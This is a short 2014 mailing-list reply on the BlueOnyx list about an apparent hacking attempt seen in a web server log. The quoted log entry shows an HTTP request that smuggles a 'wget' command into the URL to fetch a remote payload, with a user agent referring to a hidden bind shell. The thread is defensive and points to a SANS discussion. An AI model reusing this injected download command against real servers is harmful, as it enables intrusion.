[BlueOnyx:15725] Re: Hacking attempt?
Michael Stauber
mstauber at blueonyx.it
Wed Jul 30 11:25:28 -05 2014
Hi Alan,
> I've seen a number of entries on my system log that look similar to this:
>
> alan.snugglebunny.us 162.253.66.77 - - [28/Jul/2014:17:07:22 -0500] "GET
> /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day;
> HTTP/1.0" 200 14 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
Got them as well yesterday. A quick Google search turned up this discussion:
https://isc.sans.edu/forums/diary/Interesting+HTTP+User+Agent+chroot-apach0day+/18453
--
With best regards
Michael Stauber
More information about the Blueonyx
mailing list